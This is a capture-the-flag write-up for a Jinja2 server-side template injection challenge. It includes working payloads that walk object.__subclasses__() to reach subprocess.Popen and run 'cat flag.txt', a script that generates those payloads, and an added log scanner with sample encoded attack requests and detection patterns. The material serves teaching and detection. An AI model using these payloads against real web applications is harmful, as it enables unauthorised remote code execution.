# Super Secure Technology Infrastructure

| Difficulty | Points | Solves |
| ---------- | ------ | ------ |
| Easy       | 146    | 9      |

## Description

> Super secure technology infrastructure, \
> A fortress built with digital flair, \
> Encrypted and protected, no intrusion allowed, \
> Our data safe from any dare.\
> \
> Poem by ChatGPT

The initials of the challenge title (SSTI) tell us that this is a `Server Side Template Injection` challenge.

{% hint style="info" %}
Server-side template injection (SSTI) is a vulnerability that occurs when a web application embeds user input directly into the source of a template that the server then renders. If that input is not properly sanitized, an attacker can inject template syntax that is evaluated on the server when the template is rendered.
{% endhint %}

First, we need to identify the templating engine in use; the decision chart below helps with that.

<figure><img src="/files/xksbA9wO9q8qaToxHTFZ" alt=""><figcaption></figcaption></figure>

After playing with the input, we can identify that it is running `Jinja2`. We can also refer to the [hacktricks](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection) guide to identify the templating engine.

Referring to the [Jinja2 SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti) guide, we are able to perform remote code execution and get the flag!

First, we need to find the index of `<class 'subprocess.Popen'>` in the subclass list. The payload below dumps every subclass of `object`:

```
{{''.__class__.__mro__[1].__subclasses__()}}
```

<figure><img src="/files/wavMXDNrO8qhpsGJpNix" alt=""><figcaption></figcaption></figure>

A handy script to find the index:

```python
# Paste the output of the __subclasses__() payload here (truncated in this writeup).
data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
entries = data.split(', ')

# Collect every index whose class name mentions subprocess (e.g. subprocess.Popen).
indices = []
for i, entry in enumerate(entries):
    if 'subprocess' in entry:
        print("Found in index:", i)
        indices.append(i)

# Print a ready-to-use payload for each candidate index.
for i in indices:
    print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")
```

<figure><img src="/files/RrW1H70cI6BQesaC9dT7" alt=""><figcaption></figcaption></figure>

After finding the index of `<class 'subprocess.Popen'>` (397 on this instance), we can use it to perform RCE and read the flag:

```
{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}
```

<figure><img src="/files/gJjarEKCMspMn6SwbcE5" alt=""><figcaption></figcaption></figure>
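As an added detection example (not part of the original writeup), the scanner below flags request lines carrying the Jinja2 probe and `__subclasses__` chain shown above, URL-decoding repeatedly so that double-encoded payloads are also caught. The log lines and the `classify`/`scan_log` helpers are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Jinja2 expression delimiters and the attribute-walking chain used in the
# writeup ({{ ''.__class__.__mro__[1].__subclasses__()[...] }}).
EXPR_RE = re.compile(r"\{\{.*?\}\}", re.DOTALL)
DUNDER_RE = re.compile(r"__(class|mro|subclasses|globals|builtins|import|init)__")
# Strings that only appear once the chain is being turned into command execution.
EXEC_HINTS = ("subprocess", "popen", "shell=true", "communicate(", "os.system")
# Apache/nginx combined-log style: client ip ... "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly: probes are often double-encoded to slip past filters."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s.lower()

def classify(request_target: str) -> str:
    """Return 'rce', 'probe' or 'clean' for one request target (path + query)."""
    body = " ".join(EXPR_RE.findall(normalize(request_target)))
    if not body:
        return "clean"            # no template syntax in user-controlled input
    if DUNDER_RE.search(body) and any(h in body for h in EXEC_HINTS):
        return "rce"              # dunder walk plus execution primitives
    return "probe"                # e.g. {{7*7}} or a bare __subclasses__() dump

def scan_log(lines):
    """Return (client_ip, verdict, target) for every non-clean request line."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        verdict = classify(target)
        if verdict != "clean":
            hits.append((ip, verdict, target))
    return hits

SAMPLE_LOG = [  # constructed sample lines, not taken from the challenge
    '10.0.0.5 - - [01/Dec/2022:10:00:00 +0000] "GET /?name=alice HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Dec/2022:10:00:03 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498',
    '10.0.0.7 - - [01/Dec/2022:10:00:09 +0000] "GET /?name=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__()%7D%7D HTTP/1.1" 200 9140',
    '10.0.0.7 - - [01/Dec/2022:10:00:20 +0000] "GET /?name=%257B%257B%27%27.__class__.__mro__%5B1%5D.__subclasses__()%5B397%5D(%27cat%20flag.txt%27,shell=True,stdout=-1).communicate()%257D%257D HTTP/1.1" 200 533',
]

if __name__ == "__main__":
    for ip, verdict, target in scan_log(SAMPLE_LOG):
        print(f"{verdict:5s} {ip} {target}")
```

The escalation from `{{7*7}}` to a `__subclasses__()` dump to a `Popen` call is the sequence shown in this writeup, so seeing it from one client is a strong signal; the underlying fix is to pass user input to the template as a variable rather than concatenating it into the template source.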

## References

[https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection)

[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)

